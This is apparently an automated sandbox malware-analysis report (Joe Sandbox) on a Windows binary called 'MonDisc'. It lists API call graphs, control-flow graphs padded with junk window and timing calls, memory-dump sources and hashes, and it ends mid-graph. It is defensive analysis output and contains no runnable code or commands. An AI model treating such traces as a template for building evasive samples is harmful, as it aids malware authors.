19 API calls 57141->57150 57146 7ff62c93b5c5 57142->57146 57147 7ff62c93b5a3 VirtualProtect 57142->57147 57143->57141 57143->57146 57145->57132 57146->57132 57147->57141 57148 7ff62c93b5bb 57147->57148 57148->57146 57149 7ff62c93b608 57150->57149 57151 25e7e323f7f 57152 25e7e323f88 57151->57152 57155 25e7e323fd4 57152->57155 57156 25e7e323f31 57152->57156 57157 25e7e324036 57152->57157 57154 25e7e32400a CreateMutexW 57154->57156 57155->57154 57155->57156 57158 25e7e323fd4 57157->57158 57158->57157 57159 25e7e32400a CreateMutexW 57158->57159 57160 25e7e32404d 57158->57160 57159->57160 57160->57155 57161 7ff62c90b8ab 57166 7ff62c90c120 57161->57166 57165 7ff62c90b8c8 57167 7ff62c90c17e 57166->57167 57173 7ff62c90ba90 57167->57173 57170 7ff62c973de0 _handle_error 4 API calls 57171 7ff62c90b8ba 57170->57171 57172 7ff62c90bce0 18 API calls 57171->57172 57172->57165 57174 7ff62c90bad1 57173->57174 57185 7ff62c90baf9 _fread_nolock 57173->57185 57175 7ff62c90bcc6 57174->57175 57178 7ff62c90baef 57174->57178 57179 7ff62c90bb24 57174->57179 57191 7ff62c901650 18 API calls 57175->57191 57177 7ff62c90bb76 57181 7ff62c909d30 18 API calls 57177->57181 57182 7ff62c909d30 18 API calls 57178->57182 57183 7ff62c909d30 18 API calls 57179->57183 57187 7ff62c90bb9f 57181->57187 57182->57185 57183->57185 57184 7ff62c90bc95 57184->57170 57185->57175 57185->57177 57185->57187 57186 7ff62c90bc51 57186->57184 57190 7ff62c90bce0 18 API calls 57186->57190 57187->57186 57189 7ff62c909d30 18 API calls 57187->57189 57189->57186 57190->57186 57192 7ff62c8f4a01 57193 7ff62c8f4a0c 57192->57193 57194 7ff62c8f4a30 57192->57194 57193->57194 57196 7ff62c8ff9d0 57193->57196 57211 7ff62c984d84 57196->57211 57199 7ff62c8ffa42 57200 7ff62c8ffa78 57199->57200 57214 7ff62c910750 57199->57214 57202 7ff62c8ffaa7 57200->57202 57220 7ff62c8feea0 18 API calls _handle_error 57200->57220 57203 7ff62c8ffb0f 57202->57203 57221 7ff62c8feea0 18 API calls _handle_error 57202->57221 57204 7ff62c8ffb4a 57203->57204 57222 7ff62c8feea0 18 API calls _handle_error 57203->57222 57206 7ff62c984d84 _set_errno_from_matherr 11 API calls 57204->57206 57208 7ff62c8ffb4f SetLastError 57206->57208 57209 7ff62c9ee048 57208->57209 57223 7ff62c9c5560 GetLastError 57211->57223 57213 7ff62c8ff9ef GetLastError 57213->57199 57215 7ff62c910789 57214->57215 57216 7ff62c8f3037 43 API calls 57215->57216 57217 7ff62c9107ad 57216->57217 57218 7ff62c9107d7 57217->57218 57219 7ff62c8f3037 43 API calls 57217->57219 57218->57200 57219->57217 57220->57202 57221->57203 57222->57204 57224 7ff62c9c5587 57223->57224 57225 7ff62c9c5582 57223->57225 57229 7ff62c9c558f SetLastError 57224->57229 57246 7ff62c9c6f60 4 API calls 2 library calls 57224->57246 57254 7ff62c9c6f18 GetLastError FreeLibrary GetProcAddress TlsGetValue try_get_function 57225->57254 57228 7ff62c9c55aa 57228->57229 57247 7ff62c9c5ecc 57228->57247 57229->57213 57233 7ff62c9c55db 57257 7ff62c9c6f60 4 API calls 2 library calls 57233->57257 57234 7ff62c9c55cb 57255 7ff62c9c6f60 4 API calls 2 library calls 57234->57255 57237 7ff62c9c55e3 57238 7ff62c9c55f9 57237->57238 57239 7ff62c9c55e7 57237->57239 57259 7ff62c9c4e98 11 API calls _set_errno_from_matherr 57238->57259 57258 7ff62c9c6f60 4 API calls 2 library calls 57239->57258 57240 7ff62c9c55d2 57256 7ff62c9c5f4c 11 API calls 2 library calls 57240->57256 57244 7ff62c9c5601 57260 7ff62c9c5f4c 11 API calls 2 library calls 57244->57260 57246->57228 57253 7ff62c9c5edd _set_errno_from_matherr 57247->57253 57248 7ff62c9c5f2e 57250 7ff62c984d84 _set_errno_from_matherr 10 API calls 57248->57250 57249 7ff62c9c5f12 RtlAllocateHeap 57251 7ff62c9c55bd 57249->57251 57249->57253 57250->57251 57251->57233 57251->57234 57253->57248 57253->57249 57261 7ff62c9e25c0 RtlLeaveCriticalSection _invalid_parameter_noinfo _set_errno_from_matherr 57253->57261 57255->57240 57256->57229 57257->57237 57258->57240 57259->57244 57260->57229 57261->57253 57262 7ff62c8f1a21 57265 7ff62c90cf30 57262->57265 57264 7ff62c8f1a47 57271 7ff62c90cf63 57265->57271 57266 7ff62c90d2e7 57276 7ff62c901650 18 API calls 57266->57276 57268 7ff62c90a4b0 18 API calls 57268->57271 57269 7ff62c90d1af 57270 7ff62c90d151 57269->57270 57277 7ff62c901660 18 API calls 57269->57277 57270->57264 57271->57266 57271->57268 57271->57269 57271->57270 57275 7ff62c936220 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57271->57275 57275->57271 57278 7ff62c905020 57279 7ff62c8f3037 43 API calls 57278->57279 57280 7ff62c905094 57279->57280 57281 7ff62c8f63ba GetDesktopWindow 57282 7ff62c8f63cc 57281->57282 57283 7ff62c8f6476 GetDoubleClickTime 57282->57283 57284 7ff62c8f647e GetSystemDefaultLangID 57283->57284 57284->57284 57285 7ff62c8f6495 57284->57285 57309 7ff62c984af0 57285->57309 57288 7ff62c8f64b8 57289 7ff62c8f6509 GetDoubleClickTime 57288->57289 57291 7ff62c8f6514 57289->57291 57290 7ff62c8f65d4 GetDoubleClickTime GetDesktopWindow GetWindowTextLengthW 57292 7ff62c8f65f1 57290->57292 57291->57290 57291->57291 57292->57292 57293 7ff62c8f6602 GetDoubleClickTime 57292->57293 57294 7ff62c8f660a 57293->57294 57294->57294 57295 7ff62c8f6629 GetWindowTextLengthW 57294->57295 57296 7ff62c8f6636 57295->57296 57297 7ff62c8f66ac GetCommandLineW GetForegroundWindow GetTopWindow 57296->57297 57298 7ff62c8f66d0 57297->57298 57299 7ff62c984af0 13 API calls 57298->57299 57300 7ff62c8f66dc 57299->57300 57301 7ff62c8f66e6 GetLargePageMinimum GetForegroundWindow 57300->57301 57303 7ff62c8f66f9 57301->57303 57302 7ff62c8f67f0 GetTickCount 57304 7ff62c8f6884 57302->57304 57303->57302 57307 7ff62c8f672e 57303->57307 57305 7ff62c8f68a0 7 API calls 57304->57305 57308 7ff62c8f68e6 57305->57308 57306 7ff62c8f6749 GetForegroundWindow 57306->57307 57307->57302 57307->57303 57307->57306 57308->57308 57310 7ff62c984b18 57309->57310 57320 7ff62c984bcb _fread_nolock 57309->57320 57311 7ff62c984bdb 57310->57311 57315 7ff62c984b2f 57310->57315 57314 7ff62c9c5560 _set_errno_from_matherr 11 API calls 57311->57314 57311->57320 57312 7ff62c984d84 _set_errno_from_matherr 11 API calls 57313 7ff62c8f64ad GetDoubleClickTime 57312->57313 57313->57288 57316 7ff62c984bf7 57314->57316 57317 7ff62c984b70 57315->57317 57318 7ff62c984b51 SetConsoleCtrlHandler 57315->57318 57316->57320 57323 7ff62c9c5a90 12 API calls _set_errno_from_matherr 57316->57323 57322 7ff62c9c5b8c RtlLeaveCriticalSection 57317->57322 57318->57317 57320->57312 57320->57313 57323->57320 57324 7ff62c90b5f0 57327 7ff62c90bff0 57324->57327 57326 7ff62c90b608 _fread_nolock 57326->57326 57328 7ff62c90c056 57327->57328 57329 7ff62c90c014 57327->57329 57331 7ff62c909cc0 18 API calls 57328->57331 57330 7ff62c909cc0 18 API calls 57329->57330 57337 7ff62c90c021 57330->57337 57332 7ff62c90c060 57331->57332 57333 7ff62c90c10b 57332->57333 57334 7ff62c909d30 18 API calls 57332->57334 57332->57337 57341 7ff62c901650 18 API calls 57333->57341 57334->57337 57335 7ff62c90c0bd 57338 7ff62c909d30 18 API calls 57335->57338 57337->57333 57337->57335 57340 7ff62c90c0e2 57337->57340 57338->57340 57340->57326 57342 7ff62c8fa3fb 57345 7ff62c8fa391 57342->57345 57343 7ff62c8fa469 GetMessageExtraInfo 57349 7ff62c8fa474 57343->57349 57344 7ff62c8fa549 AnyPopup 57347 7ff62c8fa554 57344->57347 57345->57342 57345->57343 57346 7ff62c8fa3ad GetUserDefaultLangID 57345->57346 57346->57345 57346->57346 57348 7ff62c8fa5c2 GetLargePageMinimum GetModuleHandleW 57347->57348 57350 7ff62c8fa5de 57348->57350 57349->57344 57349->57348 57353 7ff62c8fb610 57350->57353 57362 7ff62c916850 57353->57362 57355 7ff62c8fb637 57356 7ff62c8f3037 43 API calls 57355->57356 57357 7ff62c8fb6bf 57355->57357 57356->57355 57367 7ff62c910570 57357->57367 57359 7ff62c8fa5fb 57360 7ff62c8fb6df 57360->57359 57361 7ff62c914ac0 GetLastError VirtualQuery VirtualFree SetLastError 57360->57361 57361->57359 57363 7ff62c9168bb 57362->57363 57364 7ff62c91686e WaitForSingleObject RtlDeleteCriticalSection 57362->57364 57363->57355 57365 7ff62c9168ab 57364->57365 57370 7ff62c910280 35 API calls _fread_nolock 57365->57370 57371 7ff62c93b3d0 57367->57371 57370->57363 57372 7ff62c93b3f3 57371->57372 57374 7ff62c91058c 57371->57374 57373 7ff62c93b400 VirtualFree 57372->57373 57373->57373 57373->57374 57375 7ff62c912172 LoadLibraryExA 57376 7ff62c91221b 57375->57376 57377 7ff62c912190 GetProcAddress 57375->57377 57377->57376 57378 7ff62c8f4a97 57379 7ff62c8f4aa7 57378->57379 57382 7ff62c8ff020 57379->57382 57381 7ff62c8f4ac4 57383 7ff62c984d84 _set_errno_from_matherr 11 API calls 57382->57383 57384 7ff62c8ff04e GetLastError 57383->57384 57385 7ff62c8ff080 57384->57385 57386 7ff62c8ff0ca 57384->57386 57389 7ff62c8ff0be 57385->57389 57396 7ff62c8fb470 18 API calls 57385->57396 57386->57389 57397 7ff62c8fb470 18 API calls 57386->57397 57390 7ff62c910750 43 API calls 57389->57390 57391 7ff62c8ff0f6 57389->57391 57392 7ff62c8ff131 57389->57392 57390->57392 57394 7ff62c984d84 _set_errno_from_matherr 11 API calls 57391->57394 57392->57391 57392->57392 57398 7ff62c8feea0 18 API calls _handle_error 57392->57398 57395 7ff62c8ff1e5 SetLastError 57394->57395 57395->57381 57396->57389 57397->57389 57398->57391

                              Executed Functions

                              Function 00007FF62C8F517B Relevance: 73.0, APIs: 48, Instructions: 994timewindowCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 7ff62c8f517b-7ff62c8f5180 1 7ff62c8f5182-7ff62c8f51a8 0->1 3 7ff62c8f51aa-7ff62c8f51b9 1->3 3->3 4 7ff62c8f51bb-7ff62c8f51d6 3->4 6 7ff62c8f5171-7ff62c8f5179 call 7ff62c984484 4->6 7 7ff62c8f51d8-7ff62c8f521a call 7ff62c984484 GetMessageTime 4->7 6->1 14 7ff62c8f521c-7ff62c8f522b 7->14 14->14 15 7ff62c8f522d-7ff62c8f5268 call 7ff62c984484 14->15 20 7ff62c8f526a-7ff62c8f5279 15->20 20->20 21 7ff62c8f527b-7ff62c8f5285 20->21 22 7ff62c8f5287-7ff62c8f52c6 call 7ff62c984484 * 2 21->22 29 7ff62c8f52c8-7ff62c8f52d4 GetUserDefaultLangID call 7ff62c9ee398 22->29 32 7ff62c8f52d6-7ff62c8f52eb GetSystemDefaultLangID 29->32 32->32 33 7ff62c8f52ed-7ff62c8f5361 GetParent GetDoubleClickTime * 2 call 7ff62c984484 32->33 38 7ff62c8f5364-7ff62c8f5373 33->38 38->38 39 7ff62c8f5375-7ff62c8f53ac GetWindowTextLengthW GetMessageExtraInfo call 7ff62c984484 38->39 45 7ff62c8f53af 39->45 46 7ff62c8f53b1-7ff62c8f53ff call 7ff62c984484 45->46 51 7ff62c8f5401-7ff62c8f5418 46->51 51->45 52 7ff62c8f541a-7ff62c8f544a IsIconic * 2 GetDoubleClickTime GetLastActivePopup GetMessageTime 51->52 53 7ff62c8f545d-7ff62c8f5471 call 7ff62c984484 52->53 57 7ff62c8f5473-7ff62c8f54b6 call 7ff62c984484 GetCurrentProcessId 53->57 58 7ff62c8f544c-7ff62c8f544f 53->58 63 7ff62c8f54b8-7ff62c8f54cd GetShellWindow 57->63 58->53 58->57 63->63 64 7ff62c8f54cf-7ff62c8f55cf GetTopWindow GetMessageExtraInfo call 7ff62c984484 * 2 GetParent call 7ff62c984484 * 3 63->64 86 7ff62c8f55d1-7ff62c8f55e0 64->86 86->86 87 7ff62c8f55e2-7ff62c8f55fd call 7ff62c984484 86->87 91 7ff62c8f5603-7ff62c8f561a GetTopWindow 87->91 91->91 92 7ff62c8f561c-7ff62c8f75db call 7ff62c984484 call 7ff62c9844fc call 7ff62c9844f4 call 7ff62c984484 * 2 GetLastActivePopup 91->92 109 7ff62c8f75dd-7ff62c8f75eb 92->109 109->109 110 7ff62c8f75ed-7ff62c8f75fc 109->110 111 7ff62c8f7619-7ff62c8f762c call 7ff62c984484 110->111 115 7ff62c8f75fe-7ff62c8f7602 111->115 116 7ff62c8f762e-7ff62c8f7630 111->116 115->111 115->116 117 7ff62c8f7635 116->117 118 7ff62c8f7637-7ff62c8f7645 117->118 118->118 119 7ff62c8f7647-7ff62c8f7655 118->119 119->117 120 7ff62c8f7657-7ff62c8f76a5 IsIconic call 7ff62c984484 * 2 119->120 128 7ff62c8f76a7-7ff62c8f76b5 120->128 128->128 129 7ff62c8f76b7-7ff62c8f76c6 GetMessageExtraInfo 128->129 130 7ff62c8f76e3-7ff62c8f76f9 call 7ff62c984484 129->130 134 7ff62c8f76fb-7ff62c8f77f3 call 7ff62c984484 * 3 130->134 135 7ff62c8f76c8-7ff62c8f76cc 130->135 148 7ff62c8f77f5-7ff62c8f7803 134->148 135->130 135->134 148->148 149 7ff62c8f7805-7ff62c8f7831 GetMessageExtraInfo GetCurrentProcessId GetShellWindow 148->149 150 7ff62c8f7834-7ff62c8f787e call 7ff62c984484 149->150 155 7ff62c8f7880-7ff62c8f7973 call 7ff62c984484 * 2 GetUserDefaultLangID 150->155 165 7ff62c8f7975-7ff62c8f7983 155->165 165->165 166 7ff62c8f7985-7ff62c8f7ba4 call 7ff62c984484 * 2 GetShellWindow AnyPopup GetCommandLineW call 7ff62c984484 * 2 GetMessageTime call 7ff62c984484 * 2 165->166 190 7ff62c8f7c3c-7ff62c8f7c48 166->190 191 7ff62c8f7c4e-7ff62c8f7c6a GetSystemDefaultLangID GetMessageExtraInfo GetTickCount 190->191 192 7ff62c8f7ba9-7ff62c8f7bad 190->192 193 7ff62c8f7c6d-7ff62c8f7c84 GetTickCount 191->193 192->190 192->191 193->193 194 7ff62c8f7c86-7ff62c8f7c9a GetCurrentProcessId GetTickCount IsIconic 193->194 195 7ff62c8f7c9c-7ff62c8f7caa 194->195 195->195 196 7ff62c8f7cac-7ff62c8f7cf7 GetCommandLineW GetDesktopWindow call 7ff62c984484 IsZoomed 195->196 202 7ff62c8f7cf9-7ff62c8f7d07 196->202 202->202 203 7ff62c8f7d09-7ff62c8f7ec9 call 7ff62c984484 * 2 GetLastActivePopup call 7ff62c984484 * 6 202->203 236 7ff62c8f7ecf-7ff62c8f7edd 203->236 236->236 237 7ff62c8f7edf-7ff62c8f7fcf GetDoubleClickTime call 7ff62c984484 * 2 236->237 245 7ff62c8f8100-7ff62c8f811b call 7ff62c984484 237->245 246 7ff62c8f8029-7ff62c8f8031 237->246 245->246 254 7ff62c8f812e-7ff62c8f81b9 call 7ff62c984484 * 4 245->254 251 7ff62c8f8033-7ff62c8f8041 246->251 251->251 253 7ff62c8f8043-7ff62c8f80f4 call 7ff62c984484 IsIconic call 7ff62c984484 * 2 251->253 253->245 253->254 281 7ff62c8f81b9 254->281 281->281
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Time$ClickDefaultDoubleLang$MessageParentSystemUser
                              • String ID:
                              • API String ID: 2994643361-0
                              • Opcode ID: 91ec8c885c2c6ff6561f716371217a6039addec031bcfe83c507029f45e2ccbf
                              • Instruction ID: c255fcdf3587bed30c444a5272f0466265782f6c69e309d1b253e226457bd770
                              • Opcode Fuzzy Hash: 91ec8c885c2c6ff6561f716371217a6039addec031bcfe83c507029f45e2ccbf
                              • Instruction Fuzzy Hash: 8B825C62E289074AFF545F34AD6A2B92AD47F25370FA4463ED809D2297EF3CF1498103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F5191 Relevance: 73.0, APIs: 48, Instructions: 993timewindowCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 282 7ff62c8f5191-7ff62c8f51a6 284 7ff62c8f51c7-7ff62c8f51d6 282->284 285 7ff62c8f5171-7ff62c8f51a8 call 7ff62c984484 284->285 286 7ff62c8f51d8-7ff62c8f521a call 7ff62c984484 GetMessageTime 284->286 295 7ff62c8f51aa-7ff62c8f51b9 285->295 296 7ff62c8f521c-7ff62c8f522b 286->296 295->295 297 7ff62c8f51bb-7ff62c8f51c1 295->297 296->296 298 7ff62c8f522d-7ff62c8f5268 call 7ff62c984484 296->298 297->284 303 7ff62c8f526a-7ff62c8f5279 298->303 303->303 304 7ff62c8f527b-7ff62c8f5285 303->304 305 7ff62c8f5287-7ff62c8f52c6 call 7ff62c984484 * 2 304->305 312 7ff62c8f52c8-7ff62c8f52ce GetUserDefaultLangID call 7ff62c9ee398 305->312 314 7ff62c8f52d4 312->314 315 7ff62c8f52d6-7ff62c8f52eb GetSystemDefaultLangID 314->315 315->315 316 7ff62c8f52ed-7ff62c8f5361 GetParent GetDoubleClickTime * 2 call 7ff62c984484 315->316 321 7ff62c8f5364-7ff62c8f5373 316->321 321->321 322 7ff62c8f5375-7ff62c8f53ac GetWindowTextLengthW GetMessageExtraInfo call 7ff62c984484 321->322 328 7ff62c8f53af 322->328 329 7ff62c8f53b1-7ff62c8f53ff call 7ff62c984484 328->329 334 7ff62c8f5401-7ff62c8f5418 329->334 334->328 335 7ff62c8f541a-7ff62c8f544a IsIconic * 2 GetDoubleClickTime GetLastActivePopup GetMessageTime 334->335 336 7ff62c8f545d-7ff62c8f5471 call 7ff62c984484 335->336 340 7ff62c8f5473-7ff62c8f54b6 call 7ff62c984484 GetCurrentProcessId 336->340 341 7ff62c8f544c-7ff62c8f544f 336->341 346 7ff62c8f54b8-7ff62c8f54cd GetShellWindow 340->346 341->336 341->340 346->346 347 7ff62c8f54cf-7ff62c8f55cf GetTopWindow GetMessageExtraInfo call 7ff62c984484 * 2 GetParent call 7ff62c984484 * 3 346->347 369 7ff62c8f55d1-7ff62c8f55e0 347->369 369->369 370 7ff62c8f55e2-7ff62c8f55fd call 7ff62c984484 369->370 374 7ff62c8f5603-7ff62c8f561a GetTopWindow 370->374 374->374 375 7ff62c8f561c-7ff62c8f75db call 7ff62c984484 call 7ff62c9844fc call 7ff62c9844f4 call 7ff62c984484 * 2 GetLastActivePopup 374->375 392 7ff62c8f75dd-7ff62c8f75eb 375->392 392->392 393 7ff62c8f75ed-7ff62c8f75fc 392->393 394 7ff62c8f7619-7ff62c8f762c call 7ff62c984484 393->394 398 7ff62c8f75fe-7ff62c8f7602 394->398 399 7ff62c8f762e-7ff62c8f7630 394->399 398->394 398->399 400 7ff62c8f7635 399->400 401 7ff62c8f7637-7ff62c8f7645 400->401 401->401 402 7ff62c8f7647-7ff62c8f7655 401->402 402->400 403 7ff62c8f7657-7ff62c8f76a5 IsIconic call 7ff62c984484 * 2 402->403 411 7ff62c8f76a7-7ff62c8f76b5 403->411 411->411 412 7ff62c8f76b7-7ff62c8f76c6 GetMessageExtraInfo 411->412 413 7ff62c8f76e3-7ff62c8f76f9 call 7ff62c984484 412->413 417 7ff62c8f76fb-7ff62c8f77f3 call 7ff62c984484 * 3 413->417 418 7ff62c8f76c8-7ff62c8f76cc 413->418 431 7ff62c8f77f5-7ff62c8f7803 417->431 418->413 418->417 431->431 432 7ff62c8f7805-7ff62c8f7831 GetMessageExtraInfo GetCurrentProcessId GetShellWindow 431->432 433 7ff62c8f7834-7ff62c8f787e call 7ff62c984484 432->433 438 7ff62c8f7880-7ff62c8f7973 call 7ff62c984484 * 2 GetUserDefaultLangID 433->438 448 7ff62c8f7975-7ff62c8f7983 438->448 448->448 449 7ff62c8f7985-7ff62c8f7ba4 call 7ff62c984484 * 2 GetShellWindow AnyPopup GetCommandLineW call 7ff62c984484 * 2 GetMessageTime call 7ff62c984484 * 2 448->449 473 7ff62c8f7c3c-7ff62c8f7c48 449->473 474 7ff62c8f7c4e-7ff62c8f7c6a GetSystemDefaultLangID GetMessageExtraInfo GetTickCount 473->474 475 7ff62c8f7ba9-7ff62c8f7bad 473->475 476 7ff62c8f7c6d-7ff62c8f7c84 GetTickCount 474->476 475->473 475->474 476->476 477 7ff62c8f7c86-7ff62c8f7c9a GetCurrentProcessId GetTickCount IsIconic 476->477 478 7ff62c8f7c9c-7ff62c8f7caa 477->478 478->478 479 7ff62c8f7cac-7ff62c8f7cf7 GetCommandLineW GetDesktopWindow call 7ff62c984484 IsZoomed 478->479 485 7ff62c8f7cf9-7ff62c8f7d07 479->485 485->485 486 7ff62c8f7d09-7ff62c8f7ec9 call 7ff62c984484 * 2 GetLastActivePopup call 7ff62c984484 * 6 485->486 519 7ff62c8f7ecf-7ff62c8f7edd 486->519 519->519 520 7ff62c8f7edf-7ff62c8f7fcf GetDoubleClickTime call 7ff62c984484 * 2 519->520 528 7ff62c8f8100-7ff62c8f811b call 7ff62c984484 520->528 529 7ff62c8f8029-7ff62c8f8031 520->529 528->529 537 7ff62c8f812e-7ff62c8f81b9 call 7ff62c984484 * 4 528->537 534 7ff62c8f8033-7ff62c8f8041 529->534 534->534 536 7ff62c8f8043-7ff62c8f80f4 call 7ff62c984484 IsIconic call 7ff62c984484 * 2 534->536 536->528 536->537 564 7ff62c8f81b9 537->564 564->564
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Time$ClickDefaultDoubleLang$MessageParentSystemUser
                              • String ID:
                              • API String ID: 2994643361-0
                              • Opcode ID: 64eabef1d45d85b0c78bb19536166fa48b41f505652a30b45eab00c61a6f173f
                              • Instruction ID: 7c62de22613ab7baebe31576a0eb5790a5b5476824f76493797b5bfa5578368a
                              • Opcode Fuzzy Hash: 64eabef1d45d85b0c78bb19536166fa48b41f505652a30b45eab00c61a6f173f
                              • Instruction Fuzzy Hash: 10825C62E289074AFF545F34AD6A2B92AD47F25374FA4463ED809D2297EF3CF1498103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F516F Relevance: 73.0, APIs: 48, Instructions: 987COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 565 7ff62c8f516f 566 7ff62c8f5171-7ff62c8f51a8 call 7ff62c984484 565->566 571 7ff62c8f51aa-7ff62c8f51b9 566->571 571->571 572 7ff62c8f51bb-7ff62c8f51d6 571->572 572->566 574 7ff62c8f51d8-7ff62c8f521a call 7ff62c984484 GetMessageTime 572->574 579 7ff62c8f521c-7ff62c8f522b 574->579 579->579 580 7ff62c8f522d-7ff62c8f5268 call 7ff62c984484 579->580 585 7ff62c8f526a-7ff62c8f5279 580->585 585->585 586 7ff62c8f527b-7ff62c8f5285 585->586 587 7ff62c8f5287-7ff62c8f52c6 call 7ff62c984484 * 2 586->587 594 7ff62c8f52c8-7ff62c8f52d4 GetUserDefaultLangID call 7ff62c9ee398 587->594 597 7ff62c8f52d6-7ff62c8f52eb GetSystemDefaultLangID 594->597 597->597 598 7ff62c8f52ed-7ff62c8f5361 GetParent GetDoubleClickTime * 2 call 7ff62c984484 597->598 603 7ff62c8f5364-7ff62c8f5373 598->603 603->603 604 7ff62c8f5375-7ff62c8f53ac GetWindowTextLengthW GetMessageExtraInfo call 7ff62c984484 603->604 610 7ff62c8f53af 604->610 611 7ff62c8f53b1-7ff62c8f53ff call 7ff62c984484 610->611 616 7ff62c8f5401-7ff62c8f5418 611->616 616->610 617 7ff62c8f541a-7ff62c8f544a IsIconic * 2 GetDoubleClickTime GetLastActivePopup GetMessageTime 616->617 618 7ff62c8f545d-7ff62c8f5471 call 7ff62c984484 617->618 622 7ff62c8f5473-7ff62c8f54b6 call 7ff62c984484 GetCurrentProcessId 618->622 623 7ff62c8f544c-7ff62c8f544f 618->623 628 7ff62c8f54b8-7ff62c8f54cd GetShellWindow 622->628 623->618 623->622 628->628 629 7ff62c8f54cf-7ff62c8f55cf GetTopWindow GetMessageExtraInfo call 7ff62c984484 * 2 GetParent call 7ff62c984484 * 3 628->629 651 7ff62c8f55d1-7ff62c8f55e0 629->651 651->651 652 7ff62c8f55e2-7ff62c8f55fd call 7ff62c984484 651->652 656 7ff62c8f5603-7ff62c8f561a GetTopWindow 652->656 656->656 657 7ff62c8f561c-7ff62c8f75db call 7ff62c984484 call 7ff62c9844fc call 7ff62c9844f4 call 7ff62c984484 * 2 GetLastActivePopup 656->657 674 7ff62c8f75dd-7ff62c8f75eb 657->674 674->674 675 7ff62c8f75ed-7ff62c8f75fc 674->675 676 7ff62c8f7619-7ff62c8f762c call 7ff62c984484 675->676 680 7ff62c8f75fe-7ff62c8f7602 676->680 681 7ff62c8f762e-7ff62c8f7630 676->681 680->676 680->681 682 7ff62c8f7635 681->682 683 7ff62c8f7637-7ff62c8f7645 682->683 683->683 684 7ff62c8f7647-7ff62c8f7655 683->684 684->682 685 7ff62c8f7657-7ff62c8f76a5 IsIconic call 7ff62c984484 * 2 684->685 693 7ff62c8f76a7-7ff62c8f76b5 685->693 693->693 694 7ff62c8f76b7-7ff62c8f76c6 GetMessageExtraInfo 693->694 695 7ff62c8f76e3-7ff62c8f76f9 call 7ff62c984484 694->695 699 7ff62c8f76fb-7ff62c8f77f3 call 7ff62c984484 * 3 695->699 700 7ff62c8f76c8-7ff62c8f76cc 695->700 713 7ff62c8f77f5-7ff62c8f7803 699->713 700->695 700->699 713->713 714 7ff62c8f7805-7ff62c8f7831 GetMessageExtraInfo GetCurrentProcessId GetShellWindow 713->714 715 7ff62c8f7834-7ff62c8f787e call 7ff62c984484 714->715 720 7ff62c8f7880-7ff62c8f7973 call 7ff62c984484 * 2 GetUserDefaultLangID 715->720 730 7ff62c8f7975-7ff62c8f7983 720->730 730->730 731 7ff62c8f7985-7ff62c8f7ba4 call 7ff62c984484 * 2 GetShellWindow AnyPopup GetCommandLineW call 7ff62c984484 * 2 GetMessageTime call 7ff62c984484 * 2 730->731 755 7ff62c8f7c3c-7ff62c8f7c48 731->755 756 7ff62c8f7c4e-7ff62c8f7c6a GetSystemDefaultLangID GetMessageExtraInfo GetTickCount 755->756 757 7ff62c8f7ba9-7ff62c8f7bad 755->757 758 7ff62c8f7c6d-7ff62c8f7c84 GetTickCount 756->758 757->755 757->756 758->758 759 7ff62c8f7c86-7ff62c8f7c9a GetCurrentProcessId GetTickCount IsIconic 758->759 760 7ff62c8f7c9c-7ff62c8f7caa 759->760 760->760 761 7ff62c8f7cac-7ff62c8f7cf7 GetCommandLineW GetDesktopWindow call 7ff62c984484 IsZoomed 760->761 767 7ff62c8f7cf9-7ff62c8f7d07 761->767 767->767 768 7ff62c8f7d09-7ff62c8f7ec9 call 7ff62c984484 * 2 GetLastActivePopup call 7ff62c984484 * 6 767->768 801 